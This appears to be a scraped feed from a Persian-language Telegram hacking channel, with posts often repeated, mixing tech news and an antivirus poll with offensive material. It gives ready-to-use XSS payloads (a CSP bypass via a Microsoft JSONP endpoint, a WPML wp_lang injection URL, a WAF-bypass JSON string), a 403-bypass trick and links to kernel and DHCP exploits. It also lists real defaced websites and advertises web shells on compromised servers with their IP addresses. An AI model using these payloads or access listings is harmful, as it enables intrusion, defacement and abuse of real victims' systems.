You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5🤔2
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Nuclei template: Github
Payload :
——————
0Day.Today
@LearnExploit
@Tech_Army
Nuclei template: Github
Payload :
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
#Wordpress #0day #xss——————
0Day.Today
@LearnExploit
@Tech_Army
👎4🔥3🤝1
در چند ساعت گذشته میلیون ها نفر از کاربران توییتر انیمیشن The Super Mario Bros را به طور رایگان و با کیفیتی بالا تماشا کردند.
یک کاربر توییتر با استفاده از قابلیت توییتر بلو (ارسال ویدیوهای طولانی بدون افت کیفیت) این فیلم را به طور کامل آپلود میکند که در نهایت و بعد از چندین ساعت توییتر این ویدیو را حذف میکند.
——————
0Day.Today
@LearnExploit
@Tech_Army
یک کاربر توییتر با استفاده از قابلیت توییتر بلو (ارسال ویدیوهای طولانی بدون افت کیفیت) این فیلم را به طور کامل آپلود میکند که در نهایت و بعد از چندین ساعت توییتر این ویدیو را حذف میکند.
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5🫡1
مایکروسافت به صورت رسمی مشکل ساعت تابستانی ویندوز برای ایران را حل کرد
کاربران ویندوز 10 و 11 همین حالا با نصب آپدیتهای زیر میتوانند این مشکل را حل کنند و کاربران ویندوز Windows 7.0 SP1 تا Windows Server 2022 باید تا تاریخ سه شنبه، ۱۹ اردیبهشت، برای دریافت آپدیت صبر کنند.
میتونین از این زیر اونارو دانلود کنین :
Windows 11, version 22H2
Windows 11, version 21H2
Windows 10, version 22H2, 21H2, 20H2
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
کاربران ویندوز 10 و 11 همین حالا با نصب آپدیتهای زیر میتوانند این مشکل را حل کنند و کاربران ویندوز Windows 7.0 SP1 تا Windows Server 2022 باید تا تاریخ سه شنبه، ۱۹ اردیبهشت، برای دریافت آپدیت صبر کنند.
میتونین از این زیر اونارو دانلود کنین :
Windows 11, version 22H2
Windows 11, version 21H2
Windows 10, version 22H2, 21H2, 20H2
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4👍1
Site:
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
⚡1
PHP: 7.2.34
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
🔥2👍1
از چه آنتی ویروسی استفاده میکنین ؟
و این که اگر بخواید به کسی واسه نصب پیشنهاد بدید کدوم رو پیشنهاد میدید ؟
و این که اگر بخواید به کسی واسه نصب پیشنهاد بدید کدوم رو پیشنهاد میدید ؟
Final Results
18%
bitdefender
3%
Norton
7%
McAfee
24%
Kaspersky
4%
avira
9%
Malwarebytes
36%
ESET
✍9🆒3👍1
WAF bypasses XSS payload in JSON Payload
#xss #waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
["');alert('XSS');//"]@xyz.xxx#xss #waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👌6⚡2👍2
This media is not supported in your browser
VIEW IN TELEGRAM
هوش مصنوعی بینگ به صورت عمومی در دسترس قرار گرفت
بعد از مدتها انتظار، مایکروسافت بلاخره امروز هوش مصنوعی بینگ را به صورت عمومی در دسترس تمامی کاربران قرار داد، حالا کاربران فقط با داشتن یه حساب کاربری مایکروسافت و مرورگر اج میتوانند از این هوش مصنوعی استفاده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
بعد از مدتها انتظار، مایکروسافت بلاخره امروز هوش مصنوعی بینگ را به صورت عمومی در دسترس تمامی کاربران قرار داد، حالا کاربران فقط با داشتن یه حساب کاربری مایکروسافت و مرورگر اج میتوانند از این هوش مصنوعی استفاده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6
Site:
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
🔥4
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4❤2
PHP: 7.3.33
Safe Mode: OFF
ServerIP: 92.205.4.113 [🇫🇷]
HDD: Total:2015.74 GB
Free:778.97 GB [38%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
Safe Mode: OFF
ServerIP: 92.205.4.113 [🇫🇷]
HDD: Total:2015.74 GB
Free:778.97 GB [38%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
⚡4❤🔥2👍1
یک ابزار برای Google Dorking خودکار با ChatGPT AI است که سرعت سرچ شمارو افزایش میده و به صورت رایگان در دسترس هست .
DorkSearch
#Dork #ChatGPT
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
DorkSearch
#Dork #ChatGPT
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥7⚡1
☑️ تیک آبی به Gmail اضافه شد .
از این به بعد به شرکت های بزرگ و برندها تیک آبی تعلق میگیره .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
از این به بعد به شرکت های بزرگ و برندها تیک آبی تعلق میگیره .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8😢2❤🔥1
Tiktok SSL Pinning Bypass
Bypass Tiktok SSL pinning on Android devices.
Github
#Tiktok #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Tiktok SSL pinning on Android devices.
Github
#Tiktok #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3
CVE-2023-28231 ( DHCP Server Remote Code Execution )
DHCP Server Remote Code Execution impact
Github
#windows #dhcp #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
DHCP Server Remote Code Execution impact
Github
#windows #dhcp #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍1
Site:
https://horsesbyhawk.com
https://chinatextileprinter.com
https://upstartdesign.com
https://slrecruitingresources.com/BugCod3.html
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
https://horsesbyhawk.com
https://chinatextileprinter.com
https://upstartdesign.com
https://slrecruitingresources.com/BugCod3.html
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
❤🔥3❤2
403 Forbidden bypass
try appending %2e after the fist slash!
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
try appending %2e after the fist slash!
https://host.com/path = 403 Forbiddenhttps://host.com/%2e/path = 200 OK #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡10❤🔥1👍1🆒1